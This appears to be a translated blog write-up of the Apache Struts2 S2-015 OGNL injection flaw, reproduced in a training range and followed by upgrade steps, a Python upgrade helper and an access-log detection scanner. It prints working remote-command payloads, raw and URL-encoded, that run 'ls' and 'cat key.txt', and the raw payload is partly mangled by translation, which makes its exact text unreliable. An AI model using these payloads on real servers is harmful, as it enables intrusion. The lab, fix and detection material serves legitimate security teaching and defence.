Introduction to Apache Struts2 remote code execution vulnerability (s2-015)

Apache Struts 2 is an open-source web application framework for developing Java EE web applications. A remote command execution vulnerability exists in Apache Struts 2.0.0 through 2.3.14.2. A remote attacker can exploit it to execute arbitrary OGNL code by sending a request that contains the sequences '${}' or '%{}', which results in the OGNL code being evaluated twice.

Versions: 2.0.0 to 2.3.14.2

CVE number: CVE-2013-2135

Apache Struts2 remote code execution vulnerability (s2-015) reproduction

I originally planned to build an environment to demonstrate the vulnerability, but then I remembered that Mozhe College (www.mozhe.cn/) has some vulnerability shooting-range environments, and I found one there (~ ▽ ~)~.

Open the target:

Although we know that this target has the Apache Struts2 remote code execution vulnerability (S2-015), we still follow the normal testing steps. I used struts2-scan; the download link and usage instructions are here (github.com/HatBoy/Stru…).

Note: Python 3.6.x or later is required.

Run:

Start scanning:

The scan found the S2-012, S2-046 and S2-015 vulnerabilities. Many write-ups on the Internet jump straight to S2-046 for command execution or shell upload ψ(' ∇ '), but we said this one is about S2-015, so S2-015 it is!! It looks like this, and the key can be found directly:

Here we exploit the S2-015 vulnerability with a hand-written exploit (exp):

${# context [' xwork. MethodAccessor. DenyMethodExecution '] = false, # m = # _memberAccess getClass () getDeclaredField (' allowStaticM EthodAccess '), # Margaret spellings etAccessible (true), # Margaret spellings et (# _memberAccess, true), # [email protected] mons. IO. IOUtils @ toString (@ Java. Lang. R Untime @ getRuntime (). The exec (" ls "). GetInputStream ()), # q}.action

Of course, it must be URL-encoded to be used:

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.g etDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%2 9%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ls%27%29.getInputStre am%28%29%29%2C%23q%7D.action

We found a key.txt file; we can read it with:

%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.ge tDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29 %2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.ge tInputStream%28%29%29%2C%23q%7D.action

So the key comes out. Of course, our goal is not the key itself but to reproduce the S2-015 vulnerability and show the harm it can do. Now I will talk about how to fix this vulnerability.

Apache Struts2 remote code execution vulnerability (s2-015) fix

Precautions

  • When the Struts version is updated, compatibility problems may occur, which may cause service interruption.
  • Tomcat must be restarted.
  • Before upgrading, you are advised to back up the old Struts project directory.

Repair process

Confirm the Struts version > download the new Struts library and verify SHA256 > Back up the Struts library > Delete the old Struts library > Replace the new Struts library > Verify the repair results > Complete

Step 1: Determine the Struts version

Determine the Struts application's root path (root_dir for short), for example D:\apache-tomcat-7.0.103\webapps\struts2-showcase, then locate root_dir\WEB-INF\lib\struts2-core-x.x.x.jar, where x.x.x is the version number. In this example the Struts version is 2.3.37:

Step 2: Download the new Struts library and verify SHA256

Users on versions earlier than 2.3 need to download 2.3.37 or later; users on versions later than 2.5 need to download 2.5.22 or later. (Note: downloading the Struts libraries from the links below may require a proxy ("scientific" Internet access); users who cannot download them can get the latest version from the official site: struts.apache.org/download.cg…)

The download links are as follows: 2.3.37 version: archive.apache.org/dist/struts… 2.5.22 version: archive.apache.org/dist/struts…

Open a CMD command prompt and run the following command to obtain the SHA256: certutil -hashfile <file path> SHA256

For example: certutil -hashfile D:\sain\struts-2.3.37.min-lib.zip SHA256

If the SHA256 you obtain matches the corresponding value below, the download is intact.

2.3.37 version: 22f09a1c4cdb760fa13f3e36a84f53682201924f63c65d265ec42ea6dc5e5f53
2.5.22 version: 8da7f12b3525abb0f074b95c90e447b590166ba6baefba776b01584562d07148

Step 3: Back up the old Struts library

Back up the root_dir\WEB-INF\lib directory.

Step 4: Delete the old Struts library

The packages to be deleted for 2.3.x and earlier versions are as follows (ignore those that do not exist):

  • commons-fileupload-xxx.jar
  • commons-io-xx.jar
  • commons-lang3-xx.jar (commons-lang3, not commons-lang)
  • commons-logging-xxx.jar
  • freemarker-xxx.jar
  • javassist-xxx.GA.jar
  • ognl-xxx.jar
  • struts2-core-xxx.jar
  • xwork-xxx.jar or xwork-core-xxx.jar (the name depends on the version; remove whichever is present)

The packages to be deleted for 2.5.x versions are as follows (ignore those that do not exist):

  • commons-fileupload-xxx.jar
  • commons-io-xx.jar
  • commons-lang3-xx.jar (commons-lang3, not commons-lang)
  • freemarker-xxx.jar or freemarker-xxx-incubating.jar (remove whichever is present)
  • javassist-xxx-GA.jar
  • log4j-api-xxx.jar
  • ognl-xxx.jar
  • struts2-core-xxx.jar

Step 5: Replace the new Struts library

Copy the jar packages from the lib directory of the new package into the lib directory of the Struts project (D:\apache-tomcat-7.0.103\webapps\struts2-showcase\WEB-INF\lib).

Step 6: Restart Tomcat

The repair is complete; check that all services are running normally!
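Steps 1 to 5 above, carried out as one script. This is an added example, not code from the original post or from the Struts project. It assumes that WEB-INF\lib is the directory located in Step 1, that the downloaded archive keeps its jars under a lib/ folder (as the "copy the lib directory" wording in Step 5 suggests), and that the reference SHA256 values are the two quoted in Step 2; the function names are my own. Step 6 (restarting Tomcat) is left to the operator.

```python
"""Steps 1 to 5 of the Struts upgrade above, for one web application.

Added example, not code from the original post or the Struts project. Assumes
WEB-INF/lib is the directory from Step 1, the downloaded archive keeps its jars
under a lib/ folder, and the reference SHA256 values are those quoted in Step 2.
"""
import hashlib
import re
import shutil
import zipfile
from pathlib import Path

# Affected range stated in the post: 2.0.0 to 2.3.14.2 inclusive.
S2_015_RANGE = ((2, 0, 0, 0), (2, 3, 14, 2))

# Reference SHA256 values for the fixed releases, as quoted in Step 2.
EXPECTED_SHA256 = {
    "2.3.37": "22f09a1c4cdb760fa13f3e36a84f53682201924f63c65d265ec42ea6dc5e5f53",
    "2.5.22": "8da7f12b3525abb0f074b95c90e447b590166ba6baefba776b01584562d07148",
}

# Jars deleted in Step 4 (union of the 2.3.x and 2.5.x lists); absent ones are
# skipped, and commons-lang-*.jar is left alone because it is not commons-lang3-.
OLD_JAR_PREFIXES = (
    "commons-fileupload-", "commons-io-", "commons-lang3-", "commons-logging-",
    "freemarker-", "javassist-", "log4j-api-", "ognl-", "struts2-core-", "xwork-",
)

STRUTS_CORE_RE = re.compile(r"^struts2-core-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text):
    """'2.3.14.2' -> (2, 3, 14, 2); shorter strings are zero-padded to 4 parts."""
    parts = tuple(int(p) for p in text.split("."))
    return parts + (0,) * (4 - len(parts))


def find_struts_version(lib_dir):
    """Step 1: read the version number out of struts2-core-x.x.x.jar."""
    for jar in Path(lib_dir).glob("struts2-core-*.jar"):
        match = STRUTS_CORE_RE.match(jar.name)
        if match:
            return match.group(1)
    return None


def is_vulnerable_to_s2_015(version):
    """True when the version lies inside the affected range."""
    return S2_015_RANGE[0] <= parse_version(version) <= S2_015_RANGE[1]


def sha256_of(path):
    """Chunked file hash, equivalent to 'certutil -hashfile <path> SHA256'."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_download(zip_path, version):
    """Step 2: compare the archive's SHA256 with the reference value."""
    expected = EXPECTED_SHA256.get(version)
    if expected is None:
        raise ValueError(f"no reference SHA256 for Struts {version}")
    return sha256_of(zip_path) == expected


def back_up_lib(lib_dir):
    """Step 3: copy WEB-INF/lib to a sibling lib.bak directory."""
    lib_dir = Path(lib_dir)
    backup = lib_dir.with_name(lib_dir.name + ".bak")
    shutil.copytree(lib_dir, backup)
    return backup


def remove_old_jars(lib_dir):
    """Step 4: delete the old Struts jars; returns the sorted names removed."""
    removed = []
    for jar in Path(lib_dir).glob("*.jar"):
        if jar.name.startswith(OLD_JAR_PREFIXES):
            jar.unlink()
            removed.append(jar.name)
    return sorted(removed)


def install_new_jars(zip_path, lib_dir):
    """Step 5: copy every jar found under lib/ in the archive into WEB-INF/lib."""
    lib_dir = Path(lib_dir)
    installed = []
    with zipfile.ZipFile(zip_path) as archive:
        for member in archive.namelist():
            if member.endswith(".jar") and "/lib/" in "/" + member:
                target = lib_dir / Path(member).name
                target.write_bytes(archive.read(member))
                installed.append(target.name)
    return sorted(installed)
```

Call the functions in the order of the steps: `find_struts_version` and `is_vulnerable_to_s2_015` to decide whether the upgrade is needed, `verify_download` before anything is touched (stop on a mismatch), then `back_up_lib`, `remove_old_jars` and `install_new_jars`, and finally re-run `find_struts_version` to confirm the new version before restarting Tomcat.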

Apache Struts2 remote code execution vulnerability (s2-015) protection

The upgrade requires a Tomcat restart, which is inconvenient for a server that is running live services. If there is a firewall at the network border, you can therefore configure corresponding policies there to block the attack.
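Whatever the border device is, the indicator it (or a log review) has to key on is the '${' or '%{' sequence in the requested action name, in plain or percent-encoded form. The following is an added example, not from the original post, that runs that check over constructed access-log lines. The log lines, function names and the double-decoding depth are my own choices; the indicator list is taken from the sequences named in the introduction and the OGNL context names that appear in the post's payload.

```python
"""Flag S2-015-style OGNL injection attempts in web server access logs.

Added example, not from the original post. The sample log lines are constructed
in common log format; indicators are the '${' / '%{' sequences the post names
plus the OGNL context names used in the post's payload.
"""
import re
from urllib.parse import unquote

# Common log format: IP identity user [time] "METHOD PATH PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Indicators, checked after percent-decoding the request path.
INDICATORS = ("${", "%{", "#_memberAccess", "denyMethodExecution", "allowStaticMethodAccess")


def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded %2524%257B is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def ognl_indicator(path):
    """Return the first indicator present in the decoded path, or None."""
    decoded = decode_fully(path)
    for marker in INDICATORS:
        if marker in decoded:
            return marker
    return None


def scan_access_log(lines):
    """Return (client_ip, method, raw_path, indicator) for each suspicious request."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not in the expected log format; skip rather than guess
        ip, method, path, _status = match.groups()
        marker = ognl_indicator(path)
        if marker:
            hits.append((ip, method, path, marker))
    return hits


# Constructed sample: one benign request, three harmless '${1+1}'-style probes
# (plain, '%{' variant, double-encoded) and one benign POST.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2020:10:15:02 +0800] "GET /struts2-showcase/showcase.action HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Mar/2020:10:15:09 +0800] "GET /struts2-showcase/%24%7B1%2B1%7D.action HTTP/1.1" 404 980',
    '203.0.113.7 - - [12/Mar/2020:10:15:11 +0800] "GET /struts2-showcase/%25%7B1%2B1%7D.action HTTP/1.1" 404 980',
    '203.0.113.9 - - [12/Mar/2020:10:16:40 +0800] "GET /struts2-showcase/%2524%257B1%252B1%257D.action HTTP/1.1" 404 980',
    '10.0.0.8 - - [12/Mar/2020:10:17:00 +0800] "POST /struts2-showcase/login.action HTTP/1.1" 302 -',
]

if __name__ == "__main__":
    for ip, method, path, marker in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {method} {path} -> matched {marker!r}")
```

Decoding in a loop matters because a single `unquote` leaves a double-encoded probe looking like ordinary percent-encoding; the same repeated-decoding rule is what a border policy needs if it is to catch more than the textbook payload.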